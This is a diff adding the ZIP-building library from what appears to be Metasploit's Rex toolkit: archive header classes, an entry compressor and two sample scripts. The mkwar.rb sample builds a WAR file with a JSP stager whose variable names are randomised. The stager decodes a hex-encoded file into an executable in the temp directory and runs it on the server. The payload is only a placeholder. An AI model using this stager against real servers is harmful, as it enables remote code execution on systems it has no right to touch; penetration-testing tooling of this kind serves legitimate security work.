librex 0.0.1

data/lib/rex/zip/blocks.rb

@@ -0,0 +1,182 @@
+##
+# $Id: blocks.rb 8439 2010-02-10 17:27:40Z jduck $
+##
+
+module Rex
+module Zip
+
+
+#
+# This structure holds the following data pertaining to a Zip entry's data.
+#
+# data crc
+# compressed size
+# uncompressed size
+#
+class CompInfo
+
+	def initialize(crc, compsz, uncompsz)
+		@crc, @compsz, @uncompsz = crc, compsz, uncompsz
+	end
+
+	def pack
+		[ @crc, @compsz, @uncompsz ].pack('VVV')
+	end
+
+end
+
+
+#
+# This structure holds the following data pertaining to a Zip entry.
+#
+# general purpose bit flag
+# compression method
+# modification time
+# modification date
+#
+class CompFlags
+
+	attr_accessor :compmeth
+
+	def initialize(gpbf, compmeth, timestamp)
+		@gpbf = gpbf
+		@compmeth = compmeth
+		@mod_time = ((timestamp.hour << 11) | (timestamp.min << 5) | (timestamp.sec))
+		@mod_date = (((timestamp.year - 1980) << 9) | (timestamp.mon << 5) | (timestamp.day))
+	end
+
+	def pack
+		[ @gpbf, @compmeth, @mod_time, @mod_date ].pack('vvvv')
+	end
+
+end
+
+
+
+#
+# This structure is sometimes stored after the file data and used
+# instead of the fields within the Local File Header.
+#
+class DataDesc
+
+	SIGNATURE = 0x8074b50
+
+	def initialize(compinfo)
+		@compinfo = compinfo
+	end
+
+	def pack
+		ret = [ SIGNATURE ].pack('V')
+		ret << @compinfo.pack
+		ret
+	end
+
+end
+
+
+#
+# This structure records the compression data and flags about
+# a Zip entry to a file.
+#
+class LocalFileHdr
+
+	SIGNATURE = 0x4034b50
+
+	def initialize(entry)
+		@entry = entry
+	end
+
+	def pack
+		path = @entry.relative_path
+
+		ret = [ SIGNATURE, ZIP_VERSION ].pack('Vv')
+		ret << @entry.flags.pack
+		ret << @entry.info.pack
+		ret << [ path.length, @entry.xtra.length ].pack('vv')
+		ret << path
+		ret << @entry.xtra
+		ret
+	end
+
+end
+
+
+#
+# This structure holds all of the information about a particular Zip Entry
+# as it is contained within the central directory.
+#
+class CentralDir
+
+	SIGNATURE = 0x2014b50
+
+	def initialize(entry, offset)
+		@entry = entry
+		@disknum_start = 0
+		@attr_int = 0
+		@attr_ext = 0x20
+		@hdr_offset = offset
+	end
+
+	def pack
+		path = @entry.relative_path
+
+		ret = [ SIGNATURE, ZIP_VERSION ].pack('Vv')
+		ret << [ ZIP_VERSION ].pack('v')
+		ret << @entry.flags.pack
+		ret << @entry.info.pack
+		arr = []
+		arr << path.length
+		arr << @entry.xtra.length
+		arr << @entry.comment.length
+		arr << @disknum_start
+		arr << @attr_int
+		arr << @entry.attrs
+		arr << @hdr_offset
+		ret << arr.pack('vvvvvVV')
+		ret << path
+		ret << @entry.xtra
+		ret << @entry.comment
+		# digital signature not supported
+		ret
+	end
+
+end
+
+
+#
+# This structure is written after the per-entry central directory records to
+# provide information about the archive as a whole.
+#
+class CentralDirEnd
+
+	SIGNATURE = 0x6054b50
+
+	def initialize(ncfd, cfdsz, offset, comment=nil)
+		@disk_no = 0
+		@disk_dir_start = 0
+		@ncfd_this_disk = ncfd
+		@ncfd_total = ncfd
+		@cfd_size = cfdsz
+		@start_offset = offset
+		@comment = comment
+		@comment ||= ''
+	end
+
+
+	def pack
+		arr = []
+		arr << SIGNATURE
+		arr << @disk_no
+		arr << @disk_dir_start
+		arr << @ncfd_this_disk
+		arr << @ncfd_total
+		arr << @cfd_size
+		arr << @start_offset
+		arr << @comment.length
+		(arr.pack('VvvvvVVv') + @comment)
+	end
+
+end
+
+end
+end

data/lib/rex/zip/entry.rb

@@ -0,0 +1,95 @@
+##
+# $Id: entry.rb 8572 2010-02-21 01:37:04Z jduck $
+##
+
+module Rex
+module Zip
+
+class Entry
+
+	attr_accessor :name, :flags, :info, :xtra, :comment, :attrs
+
+	def initialize(fname, data, compmeth, timestamp=nil, attrs=nil, xtra=nil, comment=nil)
+		@name = fname
+		@data = data
+		@xtra = xtra
+		@xtra ||= ''
+		@comment = comment
+		@comment ||= ''
+		@attrs = attrs
+		@attrs ||= 0
+
+		# XXX: sanitize timestmap (assume now)
+		timestamp ||= Time.now
+		@flags = CompFlags.new(0, compmeth, timestamp)
+
+		if (@data)
+			compress
+		else
+			@data = ''
+			@info = CompInfo.new(0, 0, 0)
+		end
+		@compdata ||= ''
+	end
+
+
+	def compress
+		@crc = Zlib.crc32(@data, 0)
+		case @flags.compmeth
+
+		when CM_STORE
+			@compdata = @data
+
+		when CM_DEFLATE
+			z = Zlib::Deflate.new(Zlib::BEST_COMPRESSION)
+			@compdata = z.deflate(@data, Zlib::FINISH)
+			z.close
+			@compdata = @compdata[2, @compdata.length-6]
+
+		else
+			raise 'Unsupported compression method: %u' % @flags.compmeth
+		end
+
+		# if compressing doesn't help, just store it
+		if (@compdata.length > @data.length)
+			@compdata = @data
+			@flags.compmeth = CM_STORE
+		end
+
+		@info = CompInfo.new(@crc, @compdata.length, @data.length)
+	end
+
+
+	def relative_path
+		if (@name[0,1] == '/')
+			return @name[1,@name.length]
+		end
+		@name
+	end
+
+
+	def pack
+		ret = ''
+
+		#  - lfh 1
+		lfh = LocalFileHdr.new(self)
+		ret << lfh.pack
+
+		#  - data 1
+		if (@compdata)
+			ret << @compdata
+		end
+
+		if (@gpbf & GPBF_USE_DATADESC)
+			#  - data desc 1
+			dd = DataDesc.new(@info)
+			ret << dd.pack
+		end
+
+		ret
+	end
+
+end
+
+end
+end

data/lib/rex/zip/samples/comment.rb

@@ -0,0 +1,32 @@
+#!/usr/bin/env ruby
+
+#
+# Create a zip file with comments!
+#
+
+msfbase = __FILE__
+while File.symlink?(msfbase)
+	msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+end
+inc = File.dirname(msfbase) + '/../../..'
+$:.unshift(inc)
+
+require 'rex/zip'
+
+# example usage
+zip = Rex::Zip::Archive.new
+zip.add_file("elite.txt", "A" * 1024, nil, %Q<
+                                 +---------------+
+                                 | file comment! |
+                                 +---------------+
+>)
+zip.set_comment(%Q<
+
++------------------------------------------+
+|                                          |
+| Hello!  This is the Zip Archive comment! |
+|                                          |
++------------------------------------------+
+
+>)
+zip.save_to("lolz.zip")

data/lib/rex/zip/samples/mkwar.rb

@@ -0,0 +1,138 @@
+#!/usr/bin/env ruby
+
+#
+# Create a WAR archive!
+#
+
+msfbase = __FILE__
+while File.symlink?(msfbase)
+	msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+end
+inc = File.dirname(msfbase) + '/../../..'
+$:.unshift(inc)
+
+
+require 'rex/zip'
+
+
+def rand_text_alpha(len)
+	buff = ""
+
+	foo = []
+	foo += ('A' .. 'Z').to_a
+	foo += ('a' .. 'z').to_a
+
+	# Generate a buffer from the remaining bytes
+	if foo.length >= 256
+		len.times { buff << Kernel.rand(256) }
+	else
+		len.times { buff << foo[ rand(foo.length) ] }
+	end
+
+	return buff
+end
+
+
+exe = "exe " * 1024
+var_payload = "var_payload"
+var_name = "var_name"
+
+
+zip = Rex::Zip::Archive.new
+
+# begin meta-inf/
+minf = [ 0xcafe, 0x0003 ].pack('Vv')
+zip.add_file('META-INF/', nil, minf)
+# end meta-inf/
+
+# begin meta-inf/manifest.mf
+mfraw = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n"
+zip.add_file('META-INF/MANIFEST.MF', mfraw)
+# end meta-inf/manifest.mf
+
+# begin web-inf/
+zip.add_file('WEB-INF/', '')
+# end web-inf/
+
+# begin web-inf/web.xml
+webxmlraw = %q{<?xml version="1.0" ?>
+<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
+http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
+version="2.4">
+<servlet>
+<servlet-name>NAME</servlet-name>
+<jsp-file>/PAYLOAD.jsp</jsp-file>
+</servlet>
+</web-app>
+}
+
+webxmlraw.gsub!(/NAME/, var_name)
+webxmlraw.gsub!(/PAYLOAD/, var_payload)
+
+zip.add_file('WEB-INF/web.xml', webxmlraw)
+# end web-inf/web.xml
+
+# begin <payload>.jsp
+var_hexpath       = rand_text_alpha(rand(8)+8)
+var_exepath       = rand_text_alpha(rand(8)+8)
+var_data          = rand_text_alpha(rand(8)+8)
+var_inputstream   = rand_text_alpha(rand(8)+8)
+var_outputstream  = rand_text_alpha(rand(8)+8)
+var_numbytes      = rand_text_alpha(rand(8)+8)
+var_bytearray     = rand_text_alpha(rand(8)+8)
+var_bytes         = rand_text_alpha(rand(8)+8)
+var_counter       = rand_text_alpha(rand(8)+8)
+var_char1         = rand_text_alpha(rand(8)+8)
+var_char2         = rand_text_alpha(rand(8)+8)
+var_comb          = rand_text_alpha(rand(8)+8)
+var_exe           = rand_text_alpha(rand(8)+8)
+var_hexfile       = rand_text_alpha(rand(8)+8)
+var_proc          = rand_text_alpha(rand(8)+8)
+
+jspraw =  "<%@ page import=\"java.io.*\" %>\n"
+jspraw << "<%\n"
+jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"#{var_hexfile}.txt\";\n"
+jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
+jspraw << "String #{var_data} = \"\";\n"
+
+jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
+jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
+jspraw << "}\n"
+
+jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
+jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
+
+jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
+jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
+jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
+jspraw << "#{var_inputstream}.close();\n"
+
+jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
+jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
+jspraw << "{\n"
+jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
+jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
+jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
+jspraw << "#{var_comb} <<= 4;\n"
+jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
+jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
+jspraw << "}\n"
+
+jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
+jspraw << "#{var_outputstream}.close();\n"
+
+jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
+jspraw << "%>\n"
+
+zip.add_file("#{var_payload}.jsp", jspraw)
+# end <payload>.jsp
+
+# begin <payload>.txt
+payloadraw = exe.unpack('H*')[0]
+zip.add_file("#{var_hexfile}.txt", payloadraw)
+# end <payload>.txt
+
+
+zip.save_to("test.war")